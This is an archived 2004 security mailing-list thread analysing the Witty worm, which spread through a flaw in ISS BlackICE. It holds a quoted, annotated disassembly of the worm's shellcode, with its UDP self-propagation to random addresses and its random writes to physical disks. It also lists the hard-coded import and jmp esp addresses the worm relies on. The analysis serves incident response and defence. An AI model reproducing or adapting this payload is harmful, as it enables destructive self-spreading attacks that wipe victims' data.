[Full-Disclosure] RE: Any dissasemblies of the Witty worm yet?

From: Disclosure From OSSI (disclosure_at_ossecurity.ca)
Date: 03/21/04

  • Next message: Mike Barushok: "Re: [Full-Disclosure] Re: The witty worm"
    To: "Kostya Kortchinsky" <kostya.kortchinsky@renater.fr>, <bugtraq@securityfocus.com>
    Date: Sat, 20 Mar 2004 23:47:21 -0500
    
    

    From the quick analysis of this worm (retrieved from
    http://isc.incidents.org/diary.html?date=2004-03-20), it seems that it bears
    strange similarity with SQL Slammer for the following points:

    1. It uses the same "push ascii" format as SQL Slammer, for example "push
    6B636F73h" in this worm.
    2. It uses hard-coded import addresses (listed below) as SQL Slammer.
    3. If someone can trace the origin of this worm, it might shed light on the
    origin of SQL Slammer as well?
    4. When SQL Slammer hit, some suspected that LION
    (http://www.cnhonker.com/index.php) did it and he refused the credit. From
    the latest articles on the http://www.cnhonker.com/index.php website, LION
    is probably not the person who released SQL Slammer, if and only if the
    writer of "witty" worm is the same writer for SQL Slammer since Lion's
    methods for importing functions are much more sophisticated than hard-coded
    import addresses shown in this worm.

    If I have time, I might provide a run-time analysis (and dissembly) of this
    worm within the context of blackd.exe. For now, just match up the addresses
    used in the dissembly by Kostya.

    Peter Huang
    http://www.ossecurity.ca/

     = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =

    Analyze exploit file c:\temp\temp.bin with size 0000040f

    Found: offset 000000ef value 5e0d409c in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d409c:
           Rva 000d409c is address of import fx: KERNEL32.dll!GetModuleHandleA

    Found: offset 00000106 value 5e0d4098 in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d4098:
           Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress

    Found: offset 00000121 value 5e0d4098 in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d4098:
           Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress

    Found: offset 0000014a value 5e0d4098 in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d4098:
           Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress

    Found: offset 00000164 value 5e0d409c in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d409c:
           Rva 000d409c is address of import fx: KERNEL32.dll!GetModuleHandleA

    Found: offset 0000017f value 5e0d4098 in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d4098:
           Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress

    Found: offset 00000241 value 5e0d40dc in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d40dc:
           Rva 000d40dc is address of import fx: KERNEL32.dll!CreateFileA

    Found: offset 0000027a value 5e0d40c4 in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d40c4:
           Rva 000d40c4 is address of import fx: KERNEL32.dll!SetFilePointer

    Found: offset 00000294 value 5e0d4094 in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d4094:
           Rva 000d4094 is address of import fx: KERNEL32.dll!WriteFile

    Found: offset 0000029c value 5e0d4038 in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d4038:
           Rva 000d4038 is address of import fx: KERNEL32.dll!CloseHandle

    EntryPoint Info:
    Found: offset 000002a7 value 5e077663 in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e077663:
           Rva 00077663 value 0759e4ff
           5E077663: FF E4 jmpn esp

    > -----Original Message-----
    > From: Kostya Kortchinsky [mailto:kostya.kortchinsky@renater.fr]
    > Sent: Saturday, March 20, 2004 12:39 PM
    > To: bugtraq@securityfocus.com
    > Subject: Re: Any dissasemblies of the Witty worm yet?
    >
    >
    >
    > Here is some preliminary work, I don't claim it to be exact, since
    > the API calls are guessed at the moment (I still have to get BlackICE),
    > but it should give a pretty good idea on how the thing work.
    >
    > The WriteFile might be ReadFile (which is the way Symantec sees it in
    > their analysis), but in my opinion the GENERIC_WRITE flag (and the fact
    > the memory at 0x5e000000 might be code section, then not writeable)
    > makes me think it writes arbitrary places of random physical disks -
    > with the consequences one can imagine.
    >
    > Correct me if I am wrong, I would like to receive feedback about this.
    >
    > Regards,
    >
    > Kostya Kortchinsky
    > CERT RENATER
    >
    > Nicholas Weaver wrote:
    >
    > > Has anyone done a dissassembly of the "Witty" worm yet?
    > >
    > > http://isc.incidents.org/diary.html?date=2004-03-20
    > >
    > http://securityresponse.symantec.com/avcenter/venc/data/w32.witty.
    > worm.html
    > >
    > > using the
    > > http://seclists.org/lists/bugtraq/2004/Mar/0181.html
    > > recent bug in BlackICE/RealSecure?
    > >
    > > We are seeing a lot of activity from this worm, although even
    > > a small infection would generate a LOT of traffic (a side-effect of
    > > bandwidth-limited worms, such as single-packet UDP worms).
    > >
    > > Thanks.
    > >
    >
    > seg000:000000D1 ;
    > ------------------------------------------------------------------
    > ---------
    > seg000:000000D1
    > seg000:000000D1 loc_D1:
    > ; CODE XREF: seg000:000002ABj
    > seg000:000000D1 89 E7 mov edi, esp
    > seg000:000000D3 8B 7F 14 mov edi, [edi+14h]
    > seg000:000000D6 83 C7 08 add edi, 8
    > seg000:000000D9 81 C4 E8 FD FF FF add esp, 0FFFFFDE8h
    > seg000:000000DF 31 C9 xor ecx, ecx
    > seg000:000000E1 66 B9 33 32 mov cx, 3233h
    > ; 32
    > seg000:000000E5 51 push ecx
    > seg000:000000E6 68 77 73 32 5F push 5F327377h
    > ; ws2_
    > seg000:000000EB 54 push esp
    > seg000:000000EC db 3Eh
    > seg000:000000EC 3E FF 15 9C 40 0D+ call dword ptr
    > ds:5E0D409Ch ; Probably LoadLibrary
    > seg000:000000F3 89 C3 mov ebx, eax
    > seg000:000000F5 31 C9 xor ecx, ecx
    > seg000:000000F7 66 B9 65 74 mov cx, 7465h
    > ; et
    > seg000:000000FB 51 push ecx
    > seg000:000000FC 68 73 6F 63 6B push 6B636F73h
    > ; sock
    > seg000:00000101 54 push esp
    > seg000:00000102 53 push ebx
    > seg000:00000103 db 3Eh
    > seg000:00000103 3E FF 15 98 40 0D+ call dword ptr
    > ds:5E0D4098h ; Probably GetProcAddress
    > seg000:0000010A 6A 11 push 11h
    > ; IPPROTO_UDP
    > seg000:0000010C 6A 02 push 2
    > ; SOCK_DGRAM
    > seg000:0000010E 6A 02 push 2
    > ; AF_INET
    > seg000:00000110 FF D0 call eax
    > ; socket()
    > seg000:00000112 89 C6 mov esi, eax
    > seg000:00000114 31 C9 xor ecx, ecx
    > seg000:00000116 51 push ecx
    > seg000:00000117 68 62 69 6E 64 push 646E6962h
    > ; bind
    > seg000:0000011C 54 push esp
    > seg000:0000011D 53 push ebx
    > seg000:0000011E db 3Eh
    > seg000:0000011E 3E FF 15 98 40 0D+ call dword ptr
    > ds:5E0D4098h ; Probably GetProcAddress
    > seg000:00000125 31 C9 xor ecx, ecx
    > seg000:00000127 51 push ecx
    > seg000:00000128 51 push ecx
    > seg000:00000129 51 push ecx
    > ; sin.sin_addr.s_addr = INADDR_ANY
    > seg000:0000012A 81 E9 FE FF F0 5F sub ecx, 5FF0FFFEh
    > ; 0xa00f0002
    > seg000:00000130 51 push ecx
    > ; sin.sin_family = AF_INET
    > seg000:00000130
    > ; sin.sin_port = htons(4000)
    > seg000:00000131 89 E1 mov ecx, esp
    > seg000:00000133 6A 10 push 10h
    > ; sizeof(struct sockaddr)
    > seg000:00000135 51 push ecx
    > ; &sin
    > seg000:00000136 56 push esi
    > ; s
    > seg000:00000137 FF D0 call eax
    > ; bind()
    > seg000:00000139 31 C9 xor ecx, ecx
    > seg000:0000013B 66 B9 74 6F mov cx, 6F74h
    > ; to
    > seg000:0000013F 51 push ecx
    > seg000:00000140 68 73 65 6E 64 push 646E6573h
    > ; send
    > seg000:00000145 54 push esp
    > seg000:00000146 53 push ebx
    > seg000:00000147 db 3Eh
    > seg000:00000147 3E FF 15 98 40 0D+ call dword ptr
    > ds:5E0D4098h ; Probably GetProcAddress
    > seg000:0000014E 89 C3 mov ebx, eax
    > seg000:00000150 83 C4 3C add esp, 3Ch
    > seg000:00000153
    > seg000:00000153 loc_153:
    > ; CODE XREF: seg000:000002A2j
    > seg000:00000153 31 C9 xor ecx, ecx
    > seg000:00000155 51 push ecx
    > seg000:00000156 68 65 6C 33 32 push 32336C65h
    > ; el32
    > seg000:0000015B 68 6B 65 72 6E push 6E72656Bh
    > ; kern
    > seg000:00000160 54 push esp
    > seg000:00000161 db 3Eh
    > seg000:00000161 3E FF 15 9C 40 0D+ call dword ptr
    > ds:5E0D409Ch ; Probably LoadLibrary
    > seg000:00000168 31 C9 xor ecx, ecx
    > seg000:0000016A 51 push ecx
    > seg000:0000016B 68 6F 75 6E 74 push 746E756Fh
    > ; ount
    > seg000:00000170 68 69 63 6B 43 push 436B6369h
    > ; ickC
    > seg000:00000175 68 47 65 74 54 push 54746547h
    > ; GetT
    > seg000:0000017A 54 push esp
    > seg000:0000017B 50 push eax
    > seg000:0000017C db 3Eh
    > seg000:0000017C 3E FF 15 98 40 0D+ call dword ptr
    > ds:5E0D4098h ; Probably GetProcAddress
    > seg000:00000183 FF D0 call eax
    > ; GetTickCount()
    > seg000:00000185 89 C5 mov ebp, eax
    > seg000:00000187 83 C4 1C add esp, 1Ch
    > seg000:0000018A 31 C9 xor ecx, ecx
    > seg000:0000018C 81 E9 E0 B1 FF FF sub ecx,
    > 0FFFFB1E0h ; 0x4e20
    > seg000:00000192
    > seg000:00000192 loc_192:
    > ; CODE XREF: seg000:000001F8j
    > seg000:00000192
    > ; seg000:00000255j
    > seg000:00000192 51 push ecx
    > seg000:00000193 31 C0 xor eax, eax
    > seg000:00000195 2D 03 BC FC FF sub eax,
    > 0FFFCBC03h ; 0x343fd
    > seg000:0000019A F7 E5 mul ebp
    > seg000:0000019C 2D 3D 61 D9 FF sub eax,
    > 0FFD9613Dh ; 0x269ec3
    > seg000:000001A1 89 C1 mov ecx, eax
    > ; rand() function, without the 0x7fff mask, shift coming afterwards
    > seg000:000001A1
    > ; srand() done with GetTickCount()
    > seg000:000001A3 31 C0 xor eax, eax
    > seg000:000001A5 2D 03 BC FC FF sub eax, 0FFFCBC03h
    > seg000:000001AA F7 E1 mul ecx
    > seg000:000001AC 2D 3D 61 D9 FF sub eax, 0FFD9613Dh
    > seg000:000001B1 89 C5 mov ebp, eax
    > seg000:000001B3 31 D2 xor edx, edx
    > seg000:000001B5 52 push edx
    > seg000:000001B6 52 push edx
    > seg000:000001B7 C1 E9 10 shr ecx, 10h
    > seg000:000001BA 66 89 C8 mov ax, cx
    > seg000:000001BD 50 push eax
    > ; to.sin_addr.s_addr = (rand() << 16) | rand()
    > seg000:000001BE 31 C0 xor eax, eax
    > seg000:000001C0 2D 03 BC FC FF sub eax, 0FFFCBC03h
    > seg000:000001C5 F7 E5 mul ebp
    > seg000:000001C7 2D 3D 61 D9 FF sub eax, 0FFD9613Dh
    > seg000:000001CC 89 C5 mov ebp, eax
    > seg000:000001CE 30 E4 xor ah, ah
    > seg000:000001D0 B0 02 mov al, 2
    > seg000:000001D2 50 push eax
    > ; to.sin_family = AF_INET
    > seg000:000001D2
    > ; to.sin_port = rand()
    > seg000:000001D3 89 E0 mov eax, esp
    > seg000:000001D5 6A 10 push 10h
    > ; sizeof(struct sockaddr)
    > seg000:000001D7 50 push eax
    > ; &to
    > seg000:000001D8 31 C0 xor eax, eax
    > seg000:000001DA 50 push eax
    > ; flags
    > seg000:000001DB 2D 03 BC FC FF sub eax, 0FFFCBC03h
    > seg000:000001E0 F7 E5 mul ebp
    > seg000:000001E2 2D 3D 61 D9 FF sub eax, 0FFD9613Dh
    > seg000:000001E7 89 C5 mov ebp, eax
    > seg000:000001E9 C1 E8 17 shr eax, 17h
    > seg000:000001EC 80 C4 03 add ah, 3
    > seg000:000001EF 50 push eax
    > ; len = 0x300 + (rand() >> 7)
    > seg000:000001F0 57 push edi
    > ; buf
    > seg000:000001F1 56 push esi
    > ; s
    > seg000:000001F2 FF D3 call ebx
    > ; sendto()
    > seg000:000001F4 83 C4 10 add esp, 10h
    > seg000:000001F7 59 pop ecx
    > seg000:000001F8 E2 98 loop loc_192
    > seg000:000001FA 31 C0 xor eax, eax
    > seg000:000001FC 2D 03 BC FC FF sub eax, 0FFFCBC03h
    > seg000:00000201 F7 E5 mul ebp
    > seg000:00000203 2D 3D 61 D9 FF sub eax, 0FFD9613Dh
    > seg000:00000208 89 C5 mov ebp, eax
    > seg000:0000020A C1 E8 10 shr eax, 10h
    > seg000:0000020D 80 E4 07 and ah, 7
    > seg000:00000210 80 CC 30 or ah, 30h
    > ; 0x30 | (rand() & 7)
    > seg000:00000213 B0 45 mov al, 45h ; 'E'
    > ; E
    > seg000:00000215 50 push eax
    > seg000:00000216 68 44 52 49 56 push 56495244h
    > ; DRIV
    > seg000:0000021B 68 49 43 41 4C push 4C414349h
    > ; ICAL
    > seg000:00000220 68 50 48 59 53 push 53594850h
    > ; PHYS
    > seg000:00000225 68 5C 5C 2E 5C push 5C2E5C5Ch
    > ; \\.\
    > seg000:00000225
    > ; we get here \\.\PHYSICALDRIVE0 to \\.\PHYSICALDRIVE7
    > seg000:0000022A 89 E0 mov eax, esp
    > seg000:0000022C 31 C9 xor ecx, ecx
    > seg000:0000022E 51 push ecx
    > ; NULL
    > seg000:0000022F B2 20 mov dl, 20h ; ' '
    > seg000:00000231 C1 E2 18 shl edx, 18h
    > seg000:00000234 52 push edx
    > ; FILE_FLAG_NO_BUFFERING (0x20000000)
    > seg000:00000235 6A 03 push 3
    > ; OPEN_EXISTING
    > seg000:00000237 51 push ecx
    > ; NULL
    > seg000:00000238 6A 03 push 3
    > ; FILE_SHARE_READ | FILE_SHARE_WRITE
    > seg000:0000023A D1 E2 shl edx, 1
    > seg000:0000023C 52 push edx
    > ; GENERIC_WRITE (0x40000000)
    > seg000:0000023D 50 push eax
    > ; lpFileName
    > seg000:0000023E db 3Eh
    > seg000:0000023E 3E FF 15 DC 40 0D+ call dword ptr
    > ds:5E0D40DCh ; Probably CreateFile
    > seg000:00000245 83 C4 14 add esp, 14h
    > seg000:00000248 31 C9 xor ecx, ecx
    > seg000:0000024A 81 E9 E0 B1 FF FF sub ecx,
    > 0FFFFB1E0h ; 0x4e20
    > seg000:00000250 3D FF FF FF FF cmp eax, 0FFFFFFFFh
    > seg000:00000255 0F 84 37 FF FF FF jz loc_192
    > seg000:0000025B 56 push esi
    > ; (saving socket)
    > seg000:0000025C 89 C6 mov esi, eax
    > seg000:0000025E 31 C0 xor eax, eax
    > seg000:00000260 50 push eax
    > ; FILE_BEGIN
    > seg000:00000261 50 push eax
    > ; NULL
    > seg000:00000262 2D 03 BC FC FF sub eax, 0FFFCBC03h
    > seg000:00000267 F7 E5 mul ebp
    > seg000:00000269 2D 3D 61 D9 FF sub eax, 0FFD9613Dh
    > seg000:0000026E 89 C5 mov ebp, eax
    > seg000:00000270 D1 E8 shr eax, 1
    > seg000:00000272 66 89 C8 mov ax, cx
    > seg000:00000275 50 push eax
    > ; (rand() << 15) | 0x4e20
    > seg000:00000276 56 push esi
    > ; hFile
    > seg000:00000277 db 3Eh
    > seg000:00000277 3E FF 15 C4 40 0D+ call dword ptr
    > ds:5E0D40C4h ; Probably SetFilePointer
    > seg000:00000277 5E
    > ; (really not sure about this one)
    > seg000:0000027E 31 C9 xor ecx, ecx
    > seg000:00000280 51 push ecx
    > ; 0
    > seg000:00000281 89 E2 mov edx, esp
    > seg000:00000283 51 push ecx
    > ; NULL
    > seg000:00000284 52 push edx
    > ; lpNumberOfBytesWritten
    > seg000:00000285 B5 80 mov ch, 80h ; ''
    > seg000:00000287 D1 E1 shl ecx, 1
    > seg000:00000289 51 push ecx
    > ; nNumberOfBytesToWrite (0x10000)
    > seg000:0000028A B1 5E mov cl, 5Eh ; '^'
    > seg000:0000028C C1 E1 18 shl ecx, 18h
    > seg000:0000028F 51 push ecx
    > ; lpBuffer (0x5e000000)
    > seg000:00000290 56 push esi
    > ; hFile
    > seg000:00000291 db 3Eh
    > seg000:00000291 3E FF 15 94 40 0D+ call dword ptr
    > ds:5E0D4094h ; Probably WriteFile
    > seg000:00000298 56 push esi
    > ; hObject
    > seg000:00000299 db 3Eh
    > seg000:00000299 3E FF 15 38 40 0D+ call dword ptr
    > ds:5E0D4038h ; Probably CloseHandle
    > seg000:000002A0 5E pop esi
    > seg000:000002A1 5E pop esi
    > ; (restoring socket)
    > seg000:000002A2 E9 AC FE FF FF jmp loc_153
    > seg000:000002A2 ;
    > ------------------------------------------------------------------
    > ---------
    > seg000:000002A7 63 76 07 5E dd 5E077663h
    > seg000:000002AB ;
    > ------------------------------------------------------------------
    > ---------
    > seg000:000002AB E9 21 FE FF FF jmp loc_D1
    > seg000:000002AB ;
    > ------------------------------------------------------------------
    > ---------

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Mike Barushok: "Re: [Full-Disclosure] Re: The witty worm"

    Relevant Pages

    • SV: More info on DarkMachine
      ... Subject: SV: More info on DarkMachine ... It appears that McAfee has already posted an analysis of this virus at their ... Regmon shows that the worm changed two registry keys: ... Offset: 0 Length: 10240 ...
      (Incidents)
    • More info on DarkMachine
      ... We have executed the attachment in a controlled environment with Regmon ... and Filemon running to track Registry and File accesses. ... Regmon shows that the worm changed two registry keys: ... Offset: 0 Length: 10240 ...
      (Incidents)
    • RE: [Full-Disclosure] RE: Any dissasemblies of the Witty worm yet?
      ... >strange similarity with SQL Slammer for the following points: ... >6B636F73h" in this worm. ... This is common exploit code just like using "i" as ... using "i" as the loop variable in C/C++. ...
      (Full-Disclosure)
    • Re: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
      ... That single UDP datagram is definitely faster. ... worm to Sapphire (SQL Slammer), ... "Previous scanning worms, such as Code Red, spread via many threads, ... create enough threads to counteract the network delays -- the worm ...
      (Full-Disclosure)